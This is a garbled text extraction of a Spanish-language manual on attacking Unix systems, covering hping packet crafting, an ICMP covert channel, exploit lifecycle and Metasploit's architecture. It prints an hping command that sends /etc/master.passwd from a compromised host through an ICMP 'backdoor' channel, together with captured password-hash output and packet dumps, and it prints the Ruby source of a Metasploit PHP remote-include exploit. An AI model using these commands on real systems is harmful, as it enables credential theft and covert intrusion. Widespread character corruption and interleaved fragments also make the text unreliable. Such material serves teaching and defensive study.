marcelo@saturno:~$ sudo traceroute 200.68.121.1.0 tra!eroute to (00.6).1(1.1+0 9(00.6).1(1.1+0:4 30 'op maD4 +0 bEte pa!6et ?...@ + (00.51.(33.69 9(00.51.(33.69: 171.59+ m 1)1.3(+ m 191.96) m 5 (00.51.(17.(3) 9(00.51.(17.(3): (01.+5+ m (1(.106 m (((.51) m 6 !u tomer191-6.ip"annet>or6 .net 9(00.61.191.6: (31.5+0 m (65.(33 m (66.3)) m 7 Q Q Q ?...@ marcelo@saturno:~$ sudo Iping &z &i 10 &t 1 &2 &p 1 200.68.121.1.0 ?P8NH (00.6).1(1.1+0 9et'0 (00.6).1(1.1+0:: u7p mo7e et4 () 'ea7er P 0 7ata bEte TT2 0 7uring tran it from ip1(00.51.(17.(3) name1KN5NO&N TT2 0 7uring tran it from ip1(00.51.(17.(3) name1KN5NO&N 6: TT2 0 7uring tran it from ip1(00.61.191.6 name1!u tomer1916.ip"annet>or6 .net 7: I$G* *ort FnreacIable 6rom ipR200.68.121.1 0 nameRcustomer68&121& 1 0.iplannet>or=s.net 8,3P Port Knrea!'ab"e from ip1(00.6).1(1.137 name1!u tomer6)-1(1137.ip"annet>or6 .net ): --- (00.6).1(1.1+0 'ping tati ti! --) pa!6et tran mitte74 5 pa!6et re!ei@e74 37S pa!6et "o roun7-trip min;a@g;maD 1 0.0;0.0;0.0 m marcelo@saturno:~$ marcelo@saturno:~$ sudo Iping &z &i 10 &t 2 &- &p 21 200.12 .18..1 ?P8NH (00.1(3.1)+.5 9et'0 (00.1(3.1)+.5:: . et4 +0 'ea7er P 0 7ata bEte TT2 0 7uring tran it from ip1(00.51.(+1.((5 name1KN5NO&N 3: TT2 0 7uring tran it from ip1(00.51.(33.) name1KN5NO&N +: TT2 0 7uring tran it from ip1(00.51.(33.69 name1KN5NO&N 5: TT2 0 7uring tran it from ip1(00.51.(17.(3) name1KN5NO&N TT2 0 7uring tran it from ip1(00.51.(17.(3) name1KN5NO&N 6: TT2 0 7uring tran it from ip1(00.61.191.6 name1!u tomer1916.ip"annet>or6 .net 7: TT2 0 7uring tran it from ip1(00.61.175.6 name1!u tomer61-1756.ip"annet>or6 .net ): TT2 0 7uring tran it from ip1(00.1(3.1)+.5 name1!u tomer1(3-1)+5.ip"annet>or6 .net 9: "en1+6 ip1(00.1(3.1)+.5 tt"156 DB i710 port1(1 f"ag 1.# eq1) >in15)+0 rtt173.3 m --- (00.1(3.1)+.5 'ping tati ti! --9 pa!6et tran mitte74 9 pa!6et re!ei@e74 0S pa!6et "o roun7-trip min;a@g;maD 1 73.3;73.3;73.3 m marcelo@saturno:~$

Consola 20% Eje "los de Fraceroute con !a'load "ersonalizados

En la Consola 20 se

uestra la /le9ibilidad del

odo traceroute de ="ing%

"ri ero# detectando un $ost ;2...JO.*2*.*-+> "revio al destino# "resu ible ente
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *.O de 2*.

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

el router '&o /ireIall# que rec$aza los "aquetes que si ulan ser de un servidor 5@,. :uego con FF: igual a O no $a' res"uesta# segura ente es "orque el datagra a lleg8 a destino ;2...JO.*2*.*1.>. ,egundo# se env)a un traceroute con el "uerto FC! O. co o destino% evidente ente el /ireIall ;si lo $a'> "er ite que este "uerto destino "ase "or él. Fa bién es de destacar la /acilidad con la que ="ing "er ite ar ar Ccovert c annelsD sobre cualquier "rotocolo ' "uerto so"ortado# es"ecial ente "ara "uertas traseras% en la Consola -. se "uede ver c8 o se con/igura un canal alternativo "ara enviar arc$ivos utilizando el "rotocolo 7CM!# utilizando el "a'load del "rotocolo is o ;de *2. b'tes> "ara enviar el contenido del arc$ivo de claves de un siste a FreeB,5.
C3uipo comprometido: -rootI!i!"on d0N Iping 192.168.0.2 &&icmp &d 120 &&sign cla<ebac=door &&6ile /etc/master.pass>d ?P8NH 19(.16).0.( 9em0 19(.16).0.(:: i!mp mo7e et4 () 'ea7er P 1(0 7ata bEte "en11+) ip119(.16).0.( tt"16+ i71(975( i!mpA eq10 rtt1(.1 m "en11+) ip119(.16).0.( tt"16+ i71(9753 i!mpA eq11 rtt10.7 m "en11+) ip119(.16).0.( tt"16+ i71(975+ i!mpA eq1( rtt11.5 m ?...@ Cn el cliente: mar!e"oI aturno:dM sudo Iping &&listen cla<ebac=door 192.168.0. 0 &I etI0 &&icmp 'ping3 "i ten mo7e N MBreeC.D: r!;et!;ma ter.pa >74@ 1.+0 (005;06;06 (0:19:56 broo6 <Dp M N root:M1MqBq6.00"MP,Ob7&7g$"R7r?N MBreeC.D: r!;et!;ma ter.pa >74@ 1.+0 (005;06;06 (0:19:56 broo6 <Dp M N root:M1MqBq6.00"MP,Ob7&7g$"R7r?@=?Ta"50:0:0::0:0:,'ar"ie e:;root:;u r;"o!a";bin;ba ' toor:Q:0:0::0:0:Courne-again .uperu er:;root: 7aemon:@=?Ta"50:0:0::0:0:,'ar"ie e:;root:;u r;"o!a";bin;ba ' toor:Q:0:0::0:0:Courne-again .uperu er:;root: 7aemon:Q:1:1::0:0:O>ner of manE E tem pro!e e :;root:;u r; bin;no"ogin ?...@

Consola -.% Eje "lo de un Covert C$annel "ara Frans/erencia de arc$ivos sobre 7CM!

El rol que cu "le el equi"o atado es el de enviar el !ing# es el que lo recibe# ' es "or esto que se lo con/igura en

ientras el cliente

odo ClistenD. !ara que el

is o "ueda identi/icar# entre todo el trá/ico que ca"tura# la secuencia de "ings es"erada# se con/igura la utilizaci8n de un Cto6enD o cadena de caracteres en a bos e9tre os de la co unicaci8n co o una C/ir aD# que en este caso es Cclavebac6doorD. Co o se "uede ver en la Ca"tura *J# dic$o to6en es inclu)do en
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *.0 de 2*.

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

los "ri eros b'tes de cada "ing con in/or aci8n enviado "or el equi"o co "ro etido ;*02.*JO...-.>. 5e esta anera# el ="ing que está en odo C:istenD ;aunque en realidad es un "roceso que está en deter inar que dic$o "aquete está dirigido a él.
Brame 1 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 ,'e!6 um: 0D+00+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 17 9+ 0( 63 3a (e 30 35 (3 30 +) 31 7b 0) 6b (0 70 30 36 0a 6! 96 )f 00 6+ 73 61 35 (0 7( (+ 5b 00 +0 6f 7( 73 (f 6( 6f 50 1f 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 0! 01 1( (3 65 6+ (f 6f 3a 6( (9 17 00 (0 7+ (! 30 6b (+ 37 e1 69 00 (+ 63 76 36 73 31 57 a( !0 63 +6 (f (0 (0 (0 (+ 6+ (6 a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 1e 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..1.-...:..e..<. ......I..i...... ....I.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

odo "ro iscuo> "uede

Brame ( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 ,'e!6 um: 0D+)0+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 0! 9+ 1e 63 3a (e 30 35 (3 30 +) (9 7+ 00 6b (0 70 30 36 0a 6! e1 3) 00 6+ 73 61 35 (0 7( (+ a( 00 +) 6f 7( 73 (f 6( 6f 50 (6 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 17 01 1( (3 65 6+ (f 6f 3a 6( 31 )+ 00 (0 7+ (! 30 6b (+ 37 96 !0 00 (+ 63 76 36 73 31 57 5b !0 63 +6 (f (0 (0 (0 (+ 6+ 1f a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 0( 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..:..e..1.-...<. ..t)..I......... ....?.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Brame 3 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. **. de 2*.

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing
,'e!6 um: 0D17(1 -!orre!t0 87entifier: 0D1)1( .equen!e number: (56 90D0100: Data 91(0 bEte : 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 (0 63 7( 7( 73 6e 17 9+ 0( 63 3a (6 61 3a 6e 65 3a 31 b) 0) 6b 30 3a 6! (a 65 7( 96 ba 00 6+ 3a (f (f 3a (7 3a 5b 00 17 6f 3a 7( 6( 30 61 (f 1f 00 (1 6f 30 6f 69 3a 67 7( 00 +0 1) 7( 3a 6f 6e 30 61 6f 0! 01 1( 76 30 7+ (f 3a 69 6f (9 +0 01 56 3a 3a 6( 3a 6e 7+ e1 3e 00 +) +3 (f 61 30 (0 3a a( !0 63 5+ 6) 75 73 3a 53 0a (6 a) 6! 61 61 73 6) 30 75 6+ 0) 00 61 6! 7( 7( 0a 3a 70 61 00 1e 76 +b 6! (f 7+ +( 65 65 +5 !0 65 30 69 6! 6f 6f 7( 67 00 a) 6( 3a 65 6f 6f 75 75 6f ..1.-...:..e..<. ......I.I>...... .....`....!"a@eb a!67oor@=?Ta"50: 0:0::0:0:,'ar"ie e:;root:;u r;"o !a";bin;ba '.too r:Q:0:0::0:0:Cou rne-again .uperu er:;root:.7aemo n:

Ca"tura *J% ="ing enviando de in/or aci8n en el "a'load de un !ing 7CM!

Es de destacar que si el /ireIall que está delante del sitio co "ro etido "er ite los !ings ;7CM! Ec$o> desde el is o $acia 7nternet# esta comunicaci-n puede saltearlo ! mu! posi(lemente pasar completamente desaperci(ido# 'a que 7CM! no es un "rotocolo de asiado interesante "ara observar. El sitio 4i6i de ="ing ;$tt"%&&Ii6i.$"ing.org> "osee todo ti"o. En resu en# ="ing tiene el "otencial de la @ a"# ' brindando al usuario un control a'or)a de las caracter)sticas de ás "ersonalizado tanto de ás C/inoD o ás eje "los de

los "aquetes a enviar co o de las res"uestas obtenidas. Ade ás tiene otras ca"acidades# co o el análisis de reglas de /ireIalls e 75,s# ' la trans/erencia de arc$ivos en /or a CocultaD# sin contar lo que "osibilita su :a desventajas otor de scri"ting. ás a"reciables "ueden llegar a ser su /alta de actualizaci8n

;la Glti a versi8n data del 2..5> ' la de una co unidad C/uerteD contribu'endo al desarrollo de scri"ts# /inger"rints# etc.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *** de 2*.

Ca")tulo +. ( Ca")tulo +. E9"lotaci8n de un ?bjetivo

/ap6tulo ". Fxplotaci-n de un 0(jetivo
Este es el "aso re oto a ;o ás i "ortante ' di/)cil de alcanzar con é9ito% el acceso aneras ás allá de $aber ejor aGn# el control de> un $ost objetivo. =a' incontables

de lograrlo ' de ca inos sin salida en el "roceso# donde de nada si no se tiene é9ito en esta eta"a.

realizado las tareas "revias sin inconvenientes ' con buenos resultados# no sirven !or todo esto es i "osible enu erar o siquiera clasi/icar todos los ti"os de ataques e9istentes $o' en d)a. ,in e bargo# un so ero ;' sie "re corto> listado de las vulnera(ilidades clásicas ' incluir)a a ;S47R7UL2:@T>% Liolaciones de acceso de e oria# co o el Bu//er ?ver/loI ás i "ortantes en el so/tIare de $o' en d)a

● ●

Errores de validaci8n de entradas%
○ ○ ○ ○ ○

Errores de /or ateo de strings 7n'ecci8n del ,V: 7n'ecci8n de c8digo A,, ;Cross ,ite ,cri"ting> en A"licaciones 4eb Acceso de 5irectorios ;(irector1 -raversal>

● ●

Condiciones de CCarreraD ;:ace &onditions> Escalado de !rivilegios !or otra "arte# los exploits "ueden clasi/icarse en ;S47R7UEA!:T>%

,egGn desde el lugar donde se ejecutan
○ ○

<e otos :ocales Ejecutar c8digo arbitrario Acceder a datos sin "er iso Causar un 5o, ;5enegaci8n de ,ervicio*51>

,egGn su e/ecto
○ ○ ○

,egGn el Fi"o de Lulnerabilidad que a"rovec$an Ade ás# e9iste un circuito que nor al ente recorre cada vulnerabilidad

descubierta antes que se cree un e9"loit que la a"rovec$e. ,egGn ;SMEFAUF??:T>#
*51 Ler Plosario% 5o,% 5enegaci8n de ,ervicio# "ág. *02. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. **2 de 2*.

Ca")tulo +. ( Ca")tulo +. E9"lotaci8n de un ?bjetivo

estas instancias o CCiclo de LidaD de un e9"loit# son% 7. Descu(rimiento% AlgGn investigador o el +. Aviso% :o is o /abricante de so/tIare is o al /abricante. En is a que lo

descubre una vulnerabilidad en un so/tIare ' versi8n deter inada. ás co Gn es que luego se avise del algunos casos# si éste no reconoce el /allo o a la "ersona ;co o Bugtraq# "or eje "lo>. 5e cualquier vulnerado# cosa que ocurre en "aralelo. ;. Análisis% ,e analiza el /allo "ublicado "ara deter inar el alcance del is o# qué co "onente es a/ectado# en qué versiones del so/tIare ocurre# etc. <. Desarrollo del Fxploit% Co ienza el "roceso de desarrollar un e9"loit que $aga uso del /allo. Esto general ente requiere e9tensos conoci ientos de "rogra aci8n en bajo nivel# arquitectura de la áquina# ,iste a ?"erativo# etc. Es "or esto que se la considera co o C agia negraD. . Testin)% Aqu) se co "rueba que el e9"loit /uncione en todos los casos donde deber)a $acerloH recordar que un /allo "uede involucrar di/erentes versiones# "lata/or as# etc. de un is o so/tIare. #. Release% El e9"loit se "ublica# general ente en /or a de c8digo /uente# ' odi/icado leve ente# a "ro"8sito# "ara que no /uncione en /or a directa. El objetivo es i "edir que alguien sin conoci ientos*55 lo utilice en /or a indiscri inada. 5ado lo abarcativa que es esta ateria# en este ca")tulo s8lo se introducirá a

descubri8# la "ersona que lo descubre lo da a conocer en una lista "Gblica anera# el /abricante debe trabajar en una correcci8n o C"arc$eD "ara que su so/tIare no sea

la utilizaci8n de una $erra ienta que acude en a'uda de quienes desarrollan e9"loits# realizan tests de "enetraci8n# investigadores de seguridad# estudiantes universitarios# ad inistradores de red# ' "or qué no# usuarios con /ines non' sanctos. :uego se ostrarán unos eje "los de ejecuci8n de e9"loits# ' "or Glti o se dejará un listado de enlaces a 7nternet "ara "ro/undizar el te a.

*55 Estos usuarios que s8lo utilizan e9"loits sin conocer c8 o /uncionan se los lla a C,cri"t RiddiesD en la jerga. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. **- de 2*.

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

+.*. El !ro'ecto Metas"loit
,egGn ;S,ECU!FT# "ág. *0-># en el o ento del des"egue de/initivo de la industria de la ,eguridad 7n/or ática ;*00O(2..-># C>os investigadores individuales lan$aban exploits al mundo en cual#uier lenguaJe 1 para cual#uier plataforma #ue sent"an #ue era su favorita, &ada exploit inclu"a un pa1load a su elección S...TD ;es decir# $ac)a lo que quer)a el investigador># C 1 su acción no pod"a ser alterada sin modificar el código fuente, 3sta falta de estandari$ación llevó a situaciones frustrantes donde para una vulnerabilidad se dispon"an de tres o cuatro exploits para elegir, 1 ninguno ac"a lo #ue se deseaba.D El "ro'ecto Metas"loit*5J ;M,F N /etasploit Frame.ork> ve la luz en el aBo 2..-# con el objetivo de estandari3ar ! or)ani3ar estos aspectos ca-ticos 9asta ese momento: el desarrollo ! la pu(licaci-n de exploits. En "rinci"io era un "aquete de /unciones en lenguaje !erl*5+ que co Gn ente se utilizaban en la "rogra aci8n de estas "iezas de so/tIare# utilizaban estas bibliotecas. Con el tie "o# ás algunos eje "los que justa ente ás colaboradores ' e9"loits se /ueron

agregando al "ro'ecto# con lo que /ue evidente que el C"aquete de /uncionesD original necesitaba ser re"ensado "ara "oder satis/acer las de andas de los usuarios. As) /ue co o en el 2..J la versi8n -.. del M,F /ue lanzado# total ente reescrito en un lenguaje co o Ru(!*5O# que le a"orta gran dina is o# e9celente legibilidad# s8lida orientaci8n a objetos ' la "osibilidad de ejecutarse en todas las "lata/or as donde éste lenguaje está so"ortado ;la a'or)a>.

*5J 2<: del "ro'ecto% $tt"%&&III. etas"loit.org *5+ !erl es un lenguaje de scri"ts "er/or ance es u' e9tendido# "rinci"al ente utilizado en ad inistraci8n de ejor# aunque su siste as 2ni9 ' "rogra aci8n Ieb. ,in e bargo# su legibilidad no es la activa ente# está "erdiendo su do inio en

u' buena "ara ser inter"retado. ,i bien sigue siendo desarrollado anos de !=! ;"rinci"al ente en la "arte Ieb>#

!'t$on ' <ub'. ,u 2<: es% $tt"%&&III."erl.org& *5O <ub' es un lenguaje de scri"ting que si bien tiene bastante tie "o desarrollándose ;/ue creado en *005># en estos Glti os aBos incre ent8 su "o"ularidad enor e ente gracias a un /ra eIor6 de desarrollo Ieb lla ado C<ub' on <ailsD. Fiene co o "rinci"ales caracter)sticas ser a igable# "oseer una orientaci8n a objetos u' /uerte ' uc$a /le9ibilidad ;"or ej.# relativa baja e9celentes ca"acidades de intros"ecci8n>. ,u "rinci"al desventaja es su corrigiendo. 2<:% $tt"%&&III.rub'(lang.org Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. **1 de 2*.

"er/or ance en tie "o de ejecuci8n# aunque es un "roble a que con el tie "o se irá

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

+.*.*. Esque a de Funciona iento
!or su "arte# el /ra eIor6 a "artir de su versi8n -..# qued8 organizado conce"tual ente "or sus desarrolladores de la siguiente anera%

7lustraci8n 0% Metas"loit% 5iagra a Conce"tual

Es decir# que Metas"loit básica ente dis"one de una Base de 5atos de E9"loits ' de !a'loads# donde el usuario "ara iniciar un ataque debe co binarlos# de acuerdo a las caracter)sticas del objetivo ' seleccionando ciertas o"ciones que "er itirán "ersonalizar el ataqueH tanto "ara tener é9ito ;?"ciones Avanzadas> co o "ara evitar la detecci8n ;"or "arte de los 75,s&7!,s segura ente>. En esta ilustraci8n se "ueden a"reciar relacionados los dos conce"tos i "ortantes dentro de la e9"lotaci8n del vulnerabilidades% Fxploit% C8digo que $ace C/allarD un so/tIare en /or a local o re ota a /avor del intruso# "ara /acilitar la ejecuci8n de un c8digo en el objetivo. A a'o de 2..O# la versi8n -.* de Metas"loit "osee 2J0 e9"loits dis"onibles# ás allá de los que segura ente se "ueden "rogra ar a"rovec$ando las /acilidades del /ra eIor6.

ás

4a!load% Lendr)a a cu "lir la /unci8n del c8digo a ejecutar en el objetivo# en caso de que el E9"loit enviado tenga é9ito. :a gran ventaja que "osee

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. **5 de 2*.

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

Metas"loit es que al estar se"arado ' abstra)do del e9"loit# es "osible co binar di/erentes e9"loits con di/erentes "a'loads# ' obtener resultados segGn lo que se desee% correr una consola re ota# ejecutar un co ando# etc. :o interesante de este diagra a de /unciona iento es que sirve en /or a genérica# ' "uede a"licarse a cualquier $erra ienta si ilar# 'a que representa la manera )eneralmente aceptada de atacar el pro(lema de c-mo 9acer un exploit ! c-mo =uncionan. !or eje "lo# en la Consola -* "uede verse el c8digo /uente de un e9"loit inclu)do en el M,F que a"rovec$a una vulnerabilidad en !=!. Básica ente se divide en dos "artes% una de inicializaci8n ;la /unci8n CinitializeD># que "er ite integrarse al /ra eIor6# ejecutando una serie de de/inicionesH consta de unas "ocas l)neas. ,in e bargo# "ara reducir al )ni o la cantidad de l)neas de esta anera# =ue imprescindi(le utili3ar al)unas clases ! =unciones disponi(les en el 2rame@or:# "or eje "lo de los "aquetes E9"loit%%<e ote ' <e9%%Fe9t. En ca bio# si el exploit 9u(iera tenido que escri(irse por separado% aislado del 1A2% en un len)uaje como /% se)uramente ser6a muc9o más lar)o% di=6cil de estudiar ! de modi=icar% además de pro)ramar. ientras que el e9"loit en s) se ejecuta en la /unci8n C"$"Ue9"loitD# que co o se "uede ver# s8lo

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. **J de 2*.

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit
require Jm f;!oreJ module 3 f class <Dp"oit ::KniD::&ebapp::P?PA8N,2KD< T 3 f::<Dp"oit::$emote in!"u7e <Dp"oit::$emote::T!p in!"u7e <Dp"oit::$emote::?ttp.er@er::P?P8n!"u7e de6 initia"iOe9info 1 ab: super9up7ateAinfo9info4 JNameJ 1> JP?P 8n!"u7e Heneri! <Dp"oitJ4 JDe !riptionJ 1> Sqab4 J#ut'orJ 1> - J'7mJ 04 J2i!en eJ 1> 3.BA28,<N.<4 J=er ionJ 1> JM$e@i ion: 5365 MJ4 J$eferen!e J 1> -04 JPri@i"ege7J 1> fa" e4 JPaE"oa7J 1> a JDi ab"eNop J 1> true4 J.pa!eJ 1> 3(76)4 b4 JP"atformJ 1> Jp'pJ4 J#r!'J 1> #$,?AP?P4 JTarget J 1> -- J#utomati!J4 a b004 JDefau"tTargetJ 1> 0:: regi terAoption 9-Opt.tring.ne>9JP?PK$8J4 -true4 VT'e K$8 to reque t4 >it' t'e in!"u7e parameter !'ange7 to `K$2`V4 V;te t.p'p*pat'1`K$2`V0:404 sel6.class: end de6 p'pAeDp"oit !onne!t req 1 VH<T Na7ata tore-JP?PK$8J0.g ub9J`K$2`J4 $eD::TeDt.uriAen!o7e9p'pAin!"u7eAur"::b ?TTP;1.0[r[n[r[nV printA tatu 9V.en7ing: #{req}") o!6.put9req: 7i !onne!t end end end

Consola -*% E9"loit inclu)do en el Fra eIor6 Metas"loit -..

+.*.2. Arquitectura ' Co "onentes
!ara tener una idea técnica de c8 o está organizado ' qué subsiste as integran el Fra eIor6# ;SMEFAUF??:T# "ág. *1> inclu'e un grá/ico ;7lustraci8n Error% @o se encuentra la /uente de re/erencia># con una vista de alto nivel de los 8dulos ás i "ortantes.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. **+ de 2*.

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

7lustraci8n *.% Arquitectura de Metas"loit

En un breve listado ' descri"ci8n de los los siguientes ;ver SMEFAU5ELPT>%

ás relevantes# "odr)an incluirse

7. Rex ;<ub' E9tension :ibrar'>% <e9 es el co "onente todo el Fra eIor6# ' su Gnica de"endencia es <ub' '

ás i "ortante de is o ás los

8dulos inclu)dos con el lenguaje. Básica ente es una colecci8n de clases 8dulos que "ueden ser utilizados "or "rogra adores "ara construir 8dulos alrededor del M,F. :os 8dulos ás relevantes anejando anera $erra ientas o

que lo co "onen*50 son% aE Assem(l!% Es Gtil "ara realizar o"eraciones a bajo nivel# los registros del "rocesador# "ila# etc.# ' en di/erentes arquitecturas ;little(endian&big(endian# !oIer!C# ,"arc# 9OJ# etc.>. Es una si "le e integrada al entorno de acceder a todos los ?"codes*J. de una
*50 !ara ver el c8digo /uente de <e9 ' sus *J. Ler Plosario% ?"code# "ág. *0-. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. **O de 2*. 8dulos# s8lo $a' que dirigirse al directorio `&lib&re9&hno breU 8duloe en una instalaci8n estándar de M,F.

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

"lata/or a. (E Fncodin)% ,irve "ara o/uscar*J* el contenido de un "a'load. Es i "ortante utilizarlo en caso de tener la certeza de que $a' un 75, veri/icando el trá/ico que se env)a al objetivo. cE Po(s ;Frabajos>% En ocasiones es necesario dividir una tarea en varios trabajos. :os Jobs o trabajos se de/inen co o )te s de trabajo /initos que tienen una tarea es"ec)/ica. 5e esta dE Lo))in)% Es un servicio de eE 4ost.exploitation% Este anera# la idea es /acilitar la coordinaci8n de estos trabajos con /unciones es"ec)/icas "ara ello. ensajes de estado ;:ogs> dentro del Fra eIor6# clasi/icado "or niveles ;de . a ->. 8dulo "rovee servicios 'a incor"orados "ara se dis"onen una gran variedad de utilizar re ota ente el objetivo una vez que el e9"loit tuvo é9ito. !or eje "lo# la clase ,tda"i*J2 /unciones% acceso a arc$ivos# red# siste a ' otras "ro"iedades de la áquina re ota que son casi universales. =E 4rotocols% 5a so"orte a "rotocolos estándar co o =FF!# ,MB# 5CE<!C ' ,2@<!C. )E Aervices% !er ite que uno o varios e9"loits se registren co o C,ervicioD ' escuc$en ;en "odr)an ser resultados> al ,ervidores FC!&25!# odo "ro iscuo> "or trá/ico ;' que bien is o tie "o.

9E Aoc:ets% !rovee acceso a la A!7 de ,oc6ets de <ed ;Clientes ' anejo de ,,:# etc.>. iE A!nc9roni3ation% 5ado que M,F $ace uso del Multi(F$reading# aqu) se "roveen rutinas que "er iten a"rovec$arlo. +. 2rame@or: /ore% 7 "le enta un conjunto de clases que /uncionan de inter/az a los 8dulos ' "lugins del /ra eIor6H es decir# si se desea $acer 8dulo "ara M,F# es necesario trabajar con este un "lugin o un

co "onente. Frabaja con un en/oque basado en instancias del /ra eIor6. aE DataAtore% ActGa co o un re"ositorio de datos del entorno de la instancia. (E Fvent Noti=ications% !er ite que los desarrolladores de
*J* Ler Plosario% ?/uscaci8n# "ág. *0-. *J2 :a clase ,tda"i se encuentra en el arc$ivo ubicado en &/ra eIor6( -.*&lib&re9&"ost& eter"reter&e9tensions&stda"i&stda"i.rb. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. **0 de 2*.

8dulos '

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

"lugins reaccionen a di/erentes eventos del /ra eIor6# a través de un t)"ico "roceso de registro de /ra eIor6# co o ;. 2rame@or: &ase% Este anejadores ; andlers>. cE 2rame@or: 1ana)ers% !er ite ad inistrar co "onentes cr)ticos del 8dulos# "lugins# sesiones ' trabajos. 8dulo está construido enci a del Core# ' "rovee

étodos "ara /acilitar la interacci8n con él. aE /on=i)uration% Mantiene una con/iguraci8n "ersistente# ade ás de /unciones "ara conocer la estructura de la instalaci8n ;"or eje "lo# el directorio ra)z de la is a>. 8dulos (E Lo))in)% !rovee so"orte de logging "ara el nGcleo ' "revia ente. cE Aessions% !er ite acceder a las sesiones re otas establecidas "or el usuario ;Co and,$ell o Meter"reter>. <. 2rame@or: User Inter=aces% Ler a"artado +.*.-. . 2rame@or: 1odules% El "ro"8sito "rinci"al del Fra eIor6 es /acilitar el desarrollo de Fra eIor6 ' el 8dulos que "uedan conectarse al is o ' co "artirse. Esto sucede# "or eje "lo# cuando se agrega un nuevo !a'load al is o estará dis"onible "ara ser utilizado en cualquier 8dulos descienden E9"loit# 'a que toda la arquitectura tiene bien de/inida sus inter/aces# clases ' relaciones. !ara dar otro eje "lo# todos los de la clase base Ms/%%Module# ' as) sucesiva ente. aE Fncoder% Estos 8dulos sirven "ara generar versiones trans/or adas de los "a'loads en crudo# "ara que "ri ero viajen "or la red# eviten ser detectados "or 75,s ' luego s)# ser decodi/icados en el objetivo "ara su "osterior ejecuci8n. 2n algorit o co Gn que se utiliza es el A?< binario# "or lo rá"ido ' sencillo. Está basado en <e9%%Encoding. (E Fxploit% Es el /oco "rinci"al del Fra eIor6. ,on utilizados "ara /orzar vulnerabilidades de cE N04 Menerators% Estos anera que "er ita al M,F ejecutar c8digo 8dulos se da en la clase Ms/%%E9"loit. 8dulos son utilizados "ara crear una cadena arbitrario. El so"orte "ara estos

"rinci"ales# utilizando las /unciones de <e9%%:ogging# descri"to

de instrucciones asse bler ;lla ados @?!s> que no "rovoquen ningGn e/ecto cuando se ejecuten# s8lo alterar el estado de los registros o odi/icar banderas ;flags> del "rocesador. ,on bastante utilizados en
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *2. de 2*.

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

